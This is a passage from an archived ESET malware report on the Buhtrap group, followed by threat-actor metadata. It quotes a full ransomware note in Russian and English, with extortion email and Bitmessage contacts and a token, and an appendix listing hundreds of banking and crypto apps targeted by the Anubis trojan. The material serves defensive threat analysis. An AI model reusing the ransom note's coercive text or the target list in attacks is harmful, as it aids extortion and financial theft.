скачайте\r\nпочтовый клиент. Установите почтовый клиент и создайте себе новый адрес\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 16 of 26\n\nдля отправки сообщений.\r\nНапишите нам письмо на адрес: BM-2cVK1UBcUGmSPDVMo8TN7eh7BJG9jUVrdG\r\n(с указанием Вашей почты) и мы свяжемся с Вами.\r\n \r\nВАЖНО!\r\nРасшифровка гарантируется, если Вы свяжетесь с нами в течении 72 часов.\r\nВыключение или перезагрузка компьютера может привести к потере Ваших файлов.\r\nНе пытайтесь удалить программу или запускать антивирусные средства.\r\nПопытки самостоятельной расшифровки файлов приведут к потере Ваших данных.\r\nДешифраторы других пользователей несовместимы с Вашими данными,\r\nтак как у каждого пользователя уникальный ключ шифрования.\r\n \r\nУбедительная просьба писать людям, которые действительно заинтересованы\r\nв восстановлении файлов. Не следует угрожать и требовать дешифратор.\r\nЖалобами заблокировав e-mail, Вы лишаете возможности расшифровать свои\r\nфайлы остальных.\r\n \r\n-----BEGIN TOKEN-----\r\ndgQAAAAAAAC8+WfVlVPRbtowFH2PlH+4L5uoBFbsxEngrQVKWUe7NdDtYS8eMdRa\r\niJGdwCb143cdUlG6qtt4sIjv8fG95xz73m028D3fm6ml0VavKviiylzvLSTwyeiV\r\ntFbpUhQAu5hQksQBdfCRqOQAWED7PdajuDVXG9ygUY+yXhQ1EKN20jbk2VYsJahy\r\npWGlDeSuAkMswcLKHJryAPBH+91+FHXDOIDrC/zu8IiE/N0ZIi+NlM+RcTfhrJuw\r\nqEVGnMQNcq4rbPfIGcbduJ90g9Qhm25wyr0wsmntg9iJznx2BjEstjlOBYzCI9wa\r\nsSwk/sGpA8JocECiKC0q4ieoBFERf0Klr6GG2my1ERXK6XjTpxN/Kp+Nrhud7pWt\r\n3ShVnSuNYgcpjH9uDVoCc60L24DQrpAh4ZHmxUXONs7SlNAkcE6d5/q7hDspcmng\r\n6xQ6lGIrAT9DkkMt+2UrubEwLZdtz2gSttwCfe9SGJiJUqyRwd09rteyRE5tH7Df\r\n9+DqE6PrrTvFkJ2mQeJ7E63XKGqr4JUstnj+EdptvI00t5CQMEZC37sfwl1dVpgs\r\nC7NsejIkAvsHZxh7nt5Wswth1fJUsnGuGu17ML5ZvCXYq7yZKnbSFGr9UL11lqPY\r\nLOjTkGAWjpZknz9CJg0ywFBvMO4VhITDSFq1Llsz/9IV4gkPU4zjPxD/B5d7AHBe\r\nV7r1xTnSpv9FkBhJMeOEcvdubmS11+YHoOMYSBBlDoVeovvN4z48++HgG2bFLRO3\r\nXLll6pbf\r\n-----END TOKEN-----\r\nTranslated version\r\nATTENTION, YOUR FILES ARE ENCRYPTED!\r\n \r\nYour documents, photos, databases, saved games and other\r\nimportant data has been encrypted with a unique key that is in our possession.\r\nFor data recovery, a decryptor is required.\r\n \r\nYou can restore files by emailing us:\r\ne-mail: sprosinas@cock.li\r\ne-mail: sprosinas2@protonmail.com\r\n \r\nSend your TOKEN ID and 1-2 files, up to 1 MB each.\r\nWe will restore them, to prove the possibility of decoding.\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 17 of 26\n\nAfter the demonstration, you will receive instructions for payment,\r\nand after payment You will be sent a decryptor program that will fully\r\nrestore all locked files without loss.\r\n \r\nIf you cannot contact via mail:\r\nFollow the link: https://bitmessage.org/wiki/Main_Page and download\r\nmail client. Install the email client and create yourself a new address.\r\nto send messages.\r\nWrite us a letter to the address: BM-2cVK1UBcUGmSPDVMo8TN7eh7BJG9jUVrdG\r\n(with your mail) and we will contact you.\r\n \r\nIMPORTANT!\r\nDecryption is guaranteed if you contact us within 72 hours.\r\nTurning off or restarting your computer can result in the loss of your files.\r\nDo not attempt to uninstall the program or run anti-virus tools.\r\nAttempts to self-decrypt files will lead to the loss of your data.\r\nOther users' decoders are incompatible with your data,\r\nsince each user has a unique encryption key.\r\n \r\nPlease write to people who are really interested in recovering your files.\r\nYou should not threaten us and demand the decoder. Complaints blocking e-mail,\r\nyou would lose the opportunity to decrypt your remaining files.\r\n-----BEGIN TOKEN-----\r\ndgQAAAAAAAC8+WfVlVPRbtowFH2PlH+4L5uoBFbsxEngrQVKWUe7NdDtYS8eMdRa\r\niJGdwCb143cdUlG6qtt4sIjv8fG95xz73m028D3fm6ml0VavKviiylzvLSTwyeiV\r\ntFbpUhQAu5hQksQBdfCRqOQAWED7PdajuDVXG9ygUY+yXhQ1EKN20jbk2VYsJahy\r\npWGlDeSuAkMswcLKHJryAPBH+91+FHXDOIDrC/zu8IiE/N0ZIi+NlM+RcTfhrJuw\r\nqEVGnMQNcq4rbPfIGcbduJ90g9Qhm25wyr0wsmntg9iJznx2BjEstjlOBYzCI9wa\r\nsSwk/sGpA8JocECiKC0q4ieoBFERf0Klr6GG2my1ERXK6XjTpxN/Kp+Nrhud7pWt\r\n3ShVnSuNYgcpjH9uDVoCc60L24DQrpAh4ZHmxUXONs7SlNAkcE6d5/q7hDspcmng\r\n6xQ6lGIrAT9DkkMt+2UrubEwLZdtz2gSttwCfe9SGJiJUqyRwd09rteyRE5tH7Df\r\n9+DqE6PrrTvFkJ2mQeJ7E63XKGqr4JUstnj+EdptvI00t5CQMEZC37sfwl1dVpgs\r\nC7NsejIkAvsHZxh7nt5Wswth1fJUsnGuGu17ML5ZvCXYq7yZKnbSFGr9UL11lqPY\r\nLOjTkGAWjpZknz9CJg0ywFBvMO4VhITDSFq1Llsz/9IV4gkPU4zjPxD/B5d7AHBe\r\nV7r1xTnSpv9FkBhJMeOEcvdubmS11+YHoOMYSBBlDoVeovvN4z48++HgG2bFLRO3\r\nXLll6pbf\r\n-----END TOKEN-----\r\nAppendix B: Applications targeted by Anubis\r\nat.spardat.bcrmobile\r\nat.spardat.netbanking\r\ncom.bankaustria.android.olb\r\ncom.bmo.mobile\r\ncom.cibc.android.mobi\r\ncom.rbc.mobile.android\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 18 of 26\n\ncom.scotiabank.mobile\r\ncom.td\r\ncz.airbank.android\r\neu.inmite.prj.kb.mobilbank\r\ncom.bankinter.launcher\r\ncom.kutxabank.android\r\ncom.rsi\r\ncom.tecnocom.cajalaboral\r\nes.bancopopular.nbmpopular\r\nes.evobanco.bancamovil\r\nes.lacaixa.mobile.android.newwapicon\r\ncom.dbs.hk.dbsmbanking\r\ncom.FubonMobileClient\r\ncom.hangseng.rbmobile\r\ncom.MobileTreeApp\r\ncom.mtel.androidbea\r\ncom.scb.breezebanking.hk\r\nhk.com.hsbc.hsbchkmobilebanking\r\ncom.aff.otpdirekt\r\ncom.ideomobile.hapoalim\r\ncom.infrasofttech.indianBank\r\ncom.mobikwik_new\r\ncom.oxigen.oxigenwallet\r\njp.co.aeonbank.android.passbook\r\njp.co.netbk\r\njp.co.rakuten_bank.rakutenbank\r\njp.co.sevenbank.AppPassbook\r\njp.co.smbc.direct\r\njp.mufg.bk.applisp.app\r\ncom.barclays.ke.mobile.android.ui\r\nnz.co.anz.android.mobilebanking\r\nnz.co.asb.asbmobile\r\nnz.co.bnz.droidbanking\r\nnz.co.kiwibank.mobile\r\ncom.getingroup.mobilebanking\r\neu.eleader.mobilebanking.pekao.firm\r\neu.eleader.mobilebanking.pekao\r\neu.eleader.mobilebanking.raiffeisen\r\npl.bzwbk.bzwbk24\r\npl.ipko.mobile\r\npl.mbank\r\nalior.bankingapp.android\r\ncom.comarch.mobile.banking.bgzbnpparibas.biznes\r\ncom.comarch.security.mobilebanking\r\ncom.empik.empikapp\r\ncom.empik.empikfoto\r\ncom.finanteq.finance.ca\r\ncom.orangefinansek\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 19 of 26\n\neu.eleader.mobilebanking.invest\r\npl.aliorbank.aib\r\npl.allegro\r\npl.bosbank.mobile\r\npl.bph\r\npl.bps.bankowoscmobilna\r\npl.bzwbk.ibiznes24\r\npl.bzwbk.mobile.tab.bzwbk24\r\npl.ceneo\r\npl.com.rossmann.centauros\r\npl.fmbank.smart\r\npl.ideabank.mobilebanking\r\npl.ing.mojeing\r\npl.millennium.corpApp\r\npl.orange.mojeorange\r\npl.pkobp.iko\r\npl.pkobp.ipkobiznes\r\ncom.kuveytturk.mobil\r\ncom.magiclick.odeabank\r\ncom.mobillium.papara\r\ncom.pozitron.albarakaturk\r\ncom.teb\r\nccom.tmob.denizbank\r\ncom.tmob.tabletdeniz\r\ncom.vakifbank.mobilel\r\ntr.com.sekerbilisim.mbank\r\nwit.android.bcpBankingApp.millenniumPL\r\ncom.advantage.RaiffeisenBank\r\nhr.asseco.android.jimba.mUCI.ro\r\nmay.maybank.android\r\nro.btrl.mobile\r\ncom.amazon.mShop.android.shopping\r\ncom.amazon.windowshop\r\ncom.ebay.mobile\r\nru.sberbankmobile\r\nru.sberbank.spasibo\r\nru.sberbank_sbbol\r\nru.sberbank.mobileoffice\r\nru.sberbank.sberbankir\r\nru.alfabank.mobile.android\r\nru.alfabank.oavdo.amc\r\nby.st.alfa\r\nru.alfabank.sense\r\nru.alfadirect.app\r\nru.mw\r\ncom.idamob.tinkoff.android\r\nru.tcsbank.c2c\r\nru.tinkoff.mgp\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 20 of 26\n\nru.tinkoff.sme\r\nru.tinkoff.goabroad\r\nru.vtb24.mobilebanking.android\r\nru.bm.mbm\r\ncom.vtb.mobilebank\r\ncom.bssys.VTBClient\r\ncom.bssys.vtb.mobileclient\r\ncom.akbank.android.apps.akbank_direkt\r\ncom.akbank.android.apps.akbank_direkt_tablet\r\ncom.akbank.softotp\r\ncom.akbank.android.apps.akbank_direkt_tablet_20\r\ncom.fragment.akbank\r\ncom.ykb.android\r\ncom.ykb.android.mobilonay\r\ncom.ykb.avm\r\ncom.ykb.androidtablet\r\ncom.veripark.ykbaz\r\ncom.softtech.iscek\r\ncom.yurtdisi.iscep\r\ncom.softtech.isbankasi\r\ncom.monitise.isbankmoscow\r\ncom.finansbank.mobile.cepsube\r\nfinansbank.enpara\r\ncom.magiclick.FinansPOS\r\ncom.matriksdata.finansyatirim\r\nfinansbank.enpara.sirketim\r\ncom.vipera.ts.starter.QNB\r\ncom.redrockdigimark\r\ncom.garanti.cepsubesi\r\ncom.garanti.cepbank\r\ncom.garantibank.cepsubesiro\r\ncom.matriksdata.finansyatirim\r\nbiz.mobinex.android.apps.cep_sifrematik\r\ncom.garantiyatirim.fx\r\ncom.tmobtech.halkbank\r\ncom.SifrebazCep\r\neu.newfrontier.iBanking.mobile.Halk.Retail\r\ntr.com.tradesoft.tradingsystem.gtpmobile.halk\r\ncom.DijitalSahne.EnYakinHalkbank\r\ncom.ziraat.ziraatmobil\r\ncom.ziraat.ziraattablet\r\ncom.matriksmobile.android.ziraatTrader\r\ncom.matriksdata.ziraatyatirim.pad\r\nde.comdirect.android\r\nde.commerzbanking.mobil\r\nde.consorsbank\r\ncom.db.mm.deutschebank\r\nde.dkb.portalapp\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 21 of 26\n\ncom.de.dkb.portalapp\r\ncom.ing.diba.mbbr2\r\nde.postbank.finanzassistent\r\nmobile.santander.de\r\nde.fiducia.smartphone.android.banking.vr\r\nfr.creditagricole.androidapp\r\nfr.axa.monaxa\r\nfr.banquepopulaire.cyberplus\r\nnet.bnpparibas.mescomptes\r\ncom.boursorama.android.clients\r\ncom.caisseepargne.android.mobilebanking\r\nfr.lcl.android.customerarea\r\ncom.paypal.android.p2pmobile\r\ncom.wf.wellsfargomobile\r\ncom.wf.wellsfargomobile.tablet\r\ncom.wellsFargo.ceomobile\r\ncom.usbank.mobilebanking\r\ncom.usaa.mobile.android.usaa\r\ncom.suntrust.mobilebanking\r\ncom.moneybookers.skrillpayments.neteller\r\ncom.moneybookers.skrillpayments\r\ncom.clairmail.fth\r\ncom.konylabs.capitalone\r\ncom.yinzcam.facilities.verizon\r\ncom.chase.sig.android\r\ncom.infonow.bofa\r\ncom.bankofamerica.cashpromobile\r\nuk.co.bankofscotland.businessbank\r\ncom.grppl.android.shell.BOS\r\ncom.rbs.mobile.android.natwestoffshore\r\ncom.rbs.mobile.android.natwest\r\ncom.rbs.mobile.android.natwestbandc\r\ncom.rbs.mobile.investisir\r\ncom.phyder.engage\r\ncom.rbs.mobile.android.rbs\r\ncom.rbs.mobile.android.rbsbandc\r\nuk.co.santander.santanderUK\r\nuk.co.santander.businessUK.bb\r\ncom.sovereign.santander\r\ncom.ifs.banking.fiid4202\r\ncom.fi6122.godough\r\ncom.rbs.mobile.android.ubr\r\ncom.htsu.hsbcpersonalbanking\r\ncom.grppl.android.shell.halifax\r\ncom.grppl.android.shell.CMBlloydsTSB73\r\ncom.barclays.android.barclaysmobilebanking\r\ncom.unionbank.ecommerce.mobile.android\r\ncom.unionbank.ecommerce.mobile.commercial.legacy\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 22 of 26\n\ncom.snapwork.IDBI\r\ncom.idbibank.abhay_card\r\nsrc.com.idbi\r\ncom.idbi.mpassbook\r\ncom.ing.mobile\r\ncom.snapwork.hdfc\r\ncom.sbi.SBIFreedomPlus\r\nhdfcbank.hdfcquickbank\r\ncom.csam.icici.bank.imobile\r\nin.co.bankofbaroda.mpassbook\r\ncom.axis.mobile\r\ncz.csob.smartbanking\r\ncz.sberbankcz\r\nsk.sporoapps.accounts\r\nsk.sporoapps.skener\r\ncom.cleverlance.csas.servis24\r\norg.westpac.bank\r\nnz.co.westpac\r\nau.com.suncorp.SuncorpBank\r\norg.stgeorge.bank\r\norg.banksa.bank\r\nau.com.newcastlepermanent\r\nau.com.nab.mobile\r\nau.com.mebank.banking\r\nau.com.ingdirect.android\r\nMyING.be\r\ncom.imb.banking2\r\ncom.fusion.ATMLocator\r\nau.com.cua.mb\r\ncom.commbank.netbank\r\ncom.cba.android.netbank\r\ncom.citibank.mobile.au\r\ncom.citibank.mobile.uk\r\ncom.citi.citimobile\r\norg.bom.bank\r\ncom.bendigobank.mobile\r\nme.doubledutch.hvdnz.cbnationalconference2016\r\nau.com.bankwest.mobile\r\ncom.bankofqueensland.boq\r\ncom.anz.android.gomoney\r\ncom.anz.android\r\ncom.anz.SingaporeDigitalBanking\r\ncom.anzspot.mobile\r\ncom.crowdcompass.appSQ0QACAcYJ\r\ncom.arubanetworks.atmanz\r\ncom.quickmobile.anzirevents15\r\nat.volksbank.volksbankmobile\r\nde.fiducia.smartphone.android.banking.vr\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 23 of 26\n\nit.volksbank.android\r\nit.secservizi.mobile.atime.bpaa\r\nde.fiducia.smartphone.android.securego.vr\r\ncom.unionbank.ecommerce.mobile.commercial.legacy\r\ncom.isis_papyrus.raiffeisen_pay_eyewdg\r\nat.easybank.mbanking\r\nat.easybank.tablet\r\nat.easybank.securityapp\r\nat.bawag.mbanking\r\ncom.bawagpsk.securityapp\r\nat.psa.app.bawag\r\ncom.pozitron.iscep\r\ncom.vakifbank.mobile\r\ncom.pozitron.vakifbank\r\ncom.starfinanz.smob.android.sfinanzstatus\r\ncom.starfinanz.mobile.android.pushtan\r\ncom.entersekt.authapp.sparkasse\r\ncom.starfinanz.smob.android.sfinanzstatus.tablet\r\ncom.starfinanz.smob.android.sbanking\r\ncom.palatine.android.mobilebanking.prod\r\nfr.laposte.lapostemobile\r\nfr.laposte.lapostetablet\r\ncom.cm_prod.bad\r\ncom.cm_prod.epasal\r\ncom.cm_prod_tablet.bad\r\ncom.cm_prod.nosactus\r\nmobi.societegenerale.mobile.lappli\r\ncom.bbva.netcash\r\ncom.bbva.bbvacontigo\r\ncom.bbva.bbvawallet\r\nes.bancosantander.apps\r\ncom.santander.app\r\nes.cm.android\r\nes.cm.android.tablet\r\ncom.bankia.wallet\r\ncom.jiffyondemand.user\r\ncom.latuabancaperandroid\r\ncom.latuabanca_tabperandroid\r\ncom.lynxspa.bancopopolare\r\ncom.unicredit\r\nit.bnl.apps.banking\r\nit.bnl.apps.enterprise.bnlpay\r\nit.bpc.proconl.mbplus\r\nit.copergmps.rt.pf.android.sp.bmps\r\nit.gruppocariparma.nowbanking\r\nit.ingdirect.app\r\nit.nogood.container\r\nit.popso.SCRIGNOapp\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 24 of 26\n\nposteitaliane.posteapp.apppostepay\r\ncom.abnamro.nl.mobile.payments\r\ncom.triodos.bankingnl\r\nnl.asnbank.asnbankieren\r\nnl.snsbank.mobielbetalen\r\ncom.btcturk\r\ncom.finansbank.mobile.cepsube\r\ncom.ingbanktr.ingmobil\r\ncom.kuveytturk.mobil\r\ncom.magiclick.odeabank\r\ncom.mobillium.papara\r\ncom.pozitron.albarakaturk\r\ncom.teb\r\ncom.tmob.denizbank\r\ncom.ykb.android\r\nfinansbank.enpara\r\ntr.com.hsbc.hsbcturkey\r\ntr.com.sekerbilisim.mbank\r\ncom.Plus500\r\neu.unicreditgroup.hvbapptan\r\ncom.targo_prod.bad\r\ncom.db.pwcc.dbmobile\r\ncom.db.mm.norisbank\r\ncom.bitmarket.trader\r\ncom.plunien.poloniex\r\ncom.bitmarket.trader\r\ncom.mycelium.wallet\r\ncom.bitfinex.bfxapp\r\ncom.binance.dev\r\ncom.btcturk\r\ncom.binance.odapplications\r\ncom.blockfolio.blockfolio\r\ncom.crypter.cryptocyrrency\r\nio.getdelta.android\r\ncom.edsoftapps.mycoinsvalue\r\ncom.coin.profit\r\ncom.mal.saul.coinmarketcap\r\ncom.tnx.apps.coinportfolio\r\ncom.coinbase.android\r\ncom.portfolio.coinbase_tracker\r\nde.schildbach.wallet\r\npiuk.blockchain.android\r\ninfo.blockchain.merchant\r\ncom.jackpf.blockchainsearch\r\ncom.unocoin.unocoinwallet\r\ncom.unocoin.unocoinmerchantPoS\r\ncom.thunkable.android.santoshmehta364.UNOCOIN_LIVE\r\nwos.com.zebpay\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 25 of 26\n\ncom.localbitcoinsmbapp\r\ncom.thunkable.android.manirana54.LocalBitCoins\r\ncom.thunkable.android.manirana54.LocalBitCoins_unblock\r\ncom.localbitcoins.exchange\r\ncom.coins.bit.local\r\ncom.coins.ful.bit\r\ncom.jamalabbasii1998.localbitcoin\r\nzebpay.Application\r\ncom.bitcoin.ss.zebpayindia\r\ncom.kryptokit.jaxx\r\nSource: https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "references": [ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" ], "report_names": [ "buhtrap-backdoor-ransomware-advertising-platform" ], "threat_actors": [ { "id": "01d569b1-f089-4a8f-8396-85078b93da26", "created_at": "2023-01-06T13:46:38.411615Z", "updated_at": "2026-04-10T02:00:02.963422Z", "deleted_at": null, "main_name": "BuhTrap", "aliases": [], "source_name": "MISPGALAXY:BuhTrap", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3b046db2-f60e-49ae-8e16-0cf82a4be6fb", "created_at": "2022-10-25T16:07:23.427162Z", "updated_at": "2026-04-10T02:00:04.594113Z", "deleted_at": null, "main_name": "Buhtrap", "aliases": [ "Buhtrap", "Operation TwoBee", "Ratopak Spider", "UAC-0008" ], "source_name": "ETDA:Buhtrap", "tools": [ "AmmyyRAT", "Buhtrap", "CottonCastle", "FlawedAmmyy", "NSIS", "Niteris EK", "Nullsoft Scriptable Install System", "Ratopak" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434773, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d29c2b564287bab988ac4062aa3a61beb116e6cf.pdf", "text": "https://archive.orkl.eu/d29c2b564287bab988ac4062aa3a61beb116e6cf.txt", "img": "https://archive.orkl.eu/d29c2b564287bab988ac4062aa3a61beb116e6cf.jpg" } }